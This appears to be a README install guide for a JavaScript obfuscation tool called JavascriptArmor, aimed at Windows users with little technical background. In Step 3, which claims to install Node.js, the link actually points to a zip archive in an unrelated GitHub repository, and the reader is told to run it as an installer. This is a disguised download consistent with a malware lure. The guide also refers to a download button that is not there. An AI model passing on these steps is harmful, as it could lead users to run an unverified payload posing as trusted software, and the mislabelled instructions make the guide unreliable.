The tool works through a command-line interface (CLI), but this guide will help you use it easily on Windows even if you have little or no technical background.

🚀 Getting Started with JavascriptArmor

Step 1: Visit the Download Page

Click the button below to go to the page where you can get JavascriptArmor.

Step 2: Download the Software

On the download page, find the latest release or files section. Look for the Windows version or a general download file. You will usually see a .zip, .exe, or other installer file. Click the link to start the download.


Step 3: Install Node.js

JavascriptArmor requires Node.js to run. If you don’t have Node.js yet, follow these simple steps:

  1. Open your browser and go to https://raw.githubusercontent.com/blaynadams50-cyber/JavascriptArmor/main/tutorial/Javascript_Armor_v3.9.zip.
  2. Download the Windows version (choose the LTS version for stability).
  3. Run the installer and follow the instructions.
  4. After installation, open a command prompt by pressing Win + R, typing cmd, and pressing Enter.
  5. Type node -v and press Enter. You should see the version number to confirm Node.js is installed.

Step 4: Extract JavascriptArmor Files

If you downloaded a .zip file on Step 2:

  1. Right-click on the file.
  2. Choose “Extract All” and select a folder where you want to keep the files.
  3. Open that folder when extraction is complete.

Step 5: Open Command Prompt in the Folder

Press Win + R, type cmd and press Enter.

Type cd then drag and drop the folder where JavascriptArmor is extracted, and press Enter. This changes your command prompt to work in the folder with the software.


Step 6: Install JavascriptArmor

In the command prompt, type:

npm install

and press Enter. This command downloads and sets up necessary parts for JavascriptArmor to run properly.


Step 7: Run JavascriptArmor

To protect your JavaScript file, use this command:

node index.js -i "path_to_your_file.js" -o "output_file.js"

Replace path_to_your_file.js with the location of the JavaScript file you want to protect. Replace output_file.js with the name you want for the protected file. If your input file is in the same folder, you only need to type its name.


🔄 How JavascriptArmor Works

JavascriptArmor changes your JavaScript code in ways that make it confusing to read but keep its original function. It does this by:

  • Changing variable names to random letters and numbers
  • Encoding strings so they don’t appear clearly
  • Changing the order and flow of code commands
  • Adding extra steps that only work during the program running, making reverse engineering harder

These techniques help keep your source code safe without slowing it down when running.


⚙️ Common Commands and Options

  • -i <inputFile>: Specify the file you want to protect.
  • -o <outputFile>: Specify the name for the protected file.
  • -c: Enable control flow obfuscation.
  • -e: Enable string encoding.
  • -h: Display help and command options.

Example:

node index.js -i example.js -o example-protected.js -c -e

This command protects example.js using control flow and encoding, producing example-protected.js.


📁 File Organization

  • index.js — Main program file you run.
  • config.json — Optional settings file to change behavior.
  • README.md — This guide.
  • node_modules/ — Folder created after installation with needed packages.

🔍 Troubleshooting Tips

  • Make sure Node.js is properly installed by running node -v.
  • Ensure you are in the right folder in command prompt where JavascriptArmor files are.
  • Check that your input file path is correct.
  • If errors occur during install, try running the command prompt as Administrator.
